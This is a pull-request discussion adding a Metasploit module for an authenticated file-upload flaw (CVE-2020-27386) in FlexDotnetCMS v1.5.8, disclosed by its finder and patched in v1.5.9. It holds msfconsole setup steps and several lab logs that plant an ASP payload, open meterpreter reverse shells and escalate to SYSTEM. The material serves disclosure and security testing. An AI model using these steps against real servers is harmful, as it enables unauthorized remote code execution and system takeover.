Add flexdotnetcms v1.5.8 exploit module and docs

[ErikWynter]

About

This change adds a new module to /modules/exploits/windows/http/ that exploits an arbitrary file upload vulnerability in FlexDotnetCMS v1.5.8 (CVE-2020-27386) and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed in v1.5.9.

Vulnerable system

FlexDotnetCMS v1.5.8 and prior

Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: use exploit/multi/http/FlexDotnetCMS_upload_exec
4. Do: set RHOSTS [IP]
5. Do: set USERNAME [username for the FlexDotnetCMS account]
6. Do: set PASSWORD [password for the FlexDotnetCMS account]
7. Do: set target [target]
8. Do: set payload [payload]
9. Do: set LHOST [IP]
10. Do: exploit

Options

PASSWORD

The password for the FlexDotnetCMS account to authenticate with.

TARGETURI

The base path to FlexDotnetCMS. The default value is /.

USERNAME

The username for the FlexDotnetCMS account to authenticate with. The default value is admin.

Targets

Id  Name
--  ----
0   Windows (x86)
1   Windows (x64)

Scenarios

FlexDotnetCMS v1.5.8 running on Windows Server 2012 - Windows x86 target

msf6 exploit(windows/http/flexdotnetcms_upload_exec) > show options
Module options (exploit/windows/http/flexdotnetcms_upload_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1        yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.230    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      1113             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to FlexDotnetCMS
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows (x86)
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/Administrator/Desktop/FlexDotnetCMS-1.5.8/
[*] Uploaded test file wxoI7s6knq.txt. Attempting to rename the file to wxoI7s6knq.asp...
[+] Successfully renamed test file wxoI7s6knq.txt to wxoI7s6knq.asp (this is a copy of wxoI7s6knq.txt, which remains on the server)
[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[*] Renaming wxoI7s6knq.txt to wxoI7s6knq.asp again, this time adding the payload
[+] Successfully added the ASP payload to wxoI7s6knq.asp
[*] Executing the payload...
[*] Sending stage (175174 bytes) to 192.168.1.230
[*] Meterpreter session 9 opened (192.168.1.128:4444 -> 192.168.1.230:62058) at 2020-11-02 11:10:41 -0500
[+] Successfully deleted wxoI7s6knq.txt
[+] Successfully deleted wxoI7s6knq.asp
meterpreter > getuid
Server username: WIN-S623VF4MJDR\Administrator
meterpreter > getsystem 
ge...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
tmeterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

FlexDotnetCMS v1.5.8 running on Windows Server 2012 - Windows x64 target

msf6 exploit(windows/http/flexdotnetcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/Administrator/Desktop/FlexDotnetCMS-1.5.8/
[*] Uploaded test file XLz3OTusi.txt. Attempting to rename the file to XLz3OTusi.asp...
[+] Successfully renamed test file XLz3OTusi.txt to XLz3OTusi.asp (this is a copy of XLz3OTusi.txt, which remains on the server)
[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[*] Renaming XLz3OTusi.txt to XLz3OTusi.asp again, this time adding the payload
[+] Successfully added the ASP payload to XLz3OTusi.asp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.1.230
[*] Meterpreter session 10 opened (192.168.1.128:4444 -> 192.168.1.230:62059) at 2020-11-02 11:10:55 -0500
[+] Successfully deleted XLz3OTusi.txt
[+] Successfully deleted XLz3OTusi.asp
meterpreter > getuid
Server username: WIN-S623VF4MJDR\Administrator
meterpreter >

[ErikWynter]

Notes

• Please check the documentation for instructions on how to install vulnerable software for testing. I'm afraid this is somewhat of a pain in the ass because the dependencies include a bunch of old software, but everything is still available for free. Visual Studio 2015 community is available here: https://visualstudio.microsoft.com/vs/older-downloads/ , but you'll need to create a (free) account if you don't already have one.
• As mentioned, I requested a CVE ID for this issue, but haven't heard anything from MITRE in almost a month. Because it has been patched, I didn't feel like sitting on it anymore. Plus I figured that this way, Tod at Rapid7 might be able to help assign the CVE.

[gwillcox-r7]

@todb-r7 Can you take a look into this? Another case of CVE-ID's being delayed.

[space-r7]

Thanks for the module! I've just a few suggestions.

[ErikWynter]

Thanks for the feedback @space-r7 ! I just implemented the changes. :)

[ErikWynter]

@todb-r7 Can you take a look into this? Another case of CVE-ID's being delayed.

@gwillcox-r7 @todb-r7 I finally received the CVE ID last night: CVE-2020-27386. I've added it to the module and docs now.

[ErikWynter]

I forgot to run Rubocup before, added the changes now. It still complains about the use of return in the cleanup module, but I'm not sure what to do about that so I've left it for now.

[space-r7]

Mostly minor changes to the check() method.

[ErikWynter]

Thanks @space-r7! I implemented all the changes. Let me know if I can do anything else to help get this landed.

[space-r7]

Changes look good to me. Had some assistance with testing and made sure the cleanup isn't always called:

msf6 exploit(windows/http/flexdotnetcms_upload_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > set VHOST localhost
VHOST => localhost
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/smcintyre/Downloads/FlexDotnetCMS-1.5.8/FlexDotnetCMS-1.5.8/
[*] Uploaded test file uRfpyi.txt. Attempting to rename the file to uRfpyi.asp...
[+] Successfully renamed test file uRfpyi.txt to uRfpyi.asp (this is a copy of uRfpyi.txt, which remains on the server)
[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[*] Renaming uRfpyi.txt to uRfpyi.asp again, this time adding the payload
[+] Successfully added the ASP payload to uRfpyi.asp
[*] Executing the payload...
[*] Sending stage (175174 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:49372) at 2020-12-07 15:18:59 -0500
[+] Successfully deleted uRfpyi.txt
[+] Successfully deleted uRfpyi.asp
meterpreter > getuid
Server username: WIN-I4J71512HD3\smcintyre
meterpreter > sysinfo
Computer        : WIN-I4J71512HD3
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > show options 
Module options (exploit/windows/http/flexdotnetcms_upload_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1        yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.32   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to FlexDotnetCMS
   USERNAME   admin            yes       Username to authenticate with
   VHOST      localhost        no        HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows (x86)
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > vheck
[-] Unknown command: vheck.
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > check
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/smcintyre/Downloads/FlexDotnetCMS-1.5.8/FlexDotnetCMS-1.5.8/
[*] Uploaded test file LbRhWhjtTQ.txt. Attempting to rename the file to LbRhWhjtTQ.asp...
[+] Successfully renamed test file LbRhWhjtTQ.txt to LbRhWhjtTQ.asp (this is a copy of LbRhWhjtTQ.txt, which remains on the server)
[+] 192.168.159.32:8080 - The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[+] Successfully deleted LbRhWhjtTQ.txt
[+] Successfully deleted LbRhWhjtTQ.asp
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > show targets 
Exploit targets:
   Id  Name
   --  ----
   0   Windows (x86)
   1   Windows (x64)
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > set TARGET 1
TARGET => 1
msf6 exploit(windows/http/flexdotnetcms_upload_exec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to FlexDotnetCMS
[*] FlexDotnetCMS is installed on the target at C:/Users/smcintyre/Downloads/FlexDotnetCMS-1.5.8/FlexDotnetCMS-1.5.8/
[*] Uploaded test file dPFahrw.txt. Attempting to rename the file to dPFahrw.asp...
[+] Successfully renamed test file dPFahrw.txt to dPFahrw.asp (this is a copy of dPFahrw.txt, which remains on the server)
[+] The target is vulnerable. Target is FlexDotnetCMS v1.5.8 or lower.
[*] Renaming dPFahrw.txt to dPFahrw.asp again, this time adding the payload
[+] Successfully added the ASP payload to dPFahrw.asp
[*] Executing the payload...
[*] Sending stage (200262 bytes) to 192.168.159.32
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.32:49393) at 2020-12-07 15:19:20 -0500
[+] Successfully deleted dPFahrw.txt
[+] Successfully deleted dPFahrw.asp
meterpreter > getuid
Server username: WIN-I4J71512HD3\smcintyre
meterpreter > sysinfo
Computer        : WIN-I4J71512HD3
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

[space-r7]

Release Notes

New module exploits/windows/http/flexdotnetcms_upload_exec adds an exploit for FlexDotNetCMS versions 1.5.8 and prior. This module exploits an authenticated file upload vulnerability where a valid user can upload a malicious file with an incorrect extension, rename it with the proper extension, and get code execution as the user running the server on the target.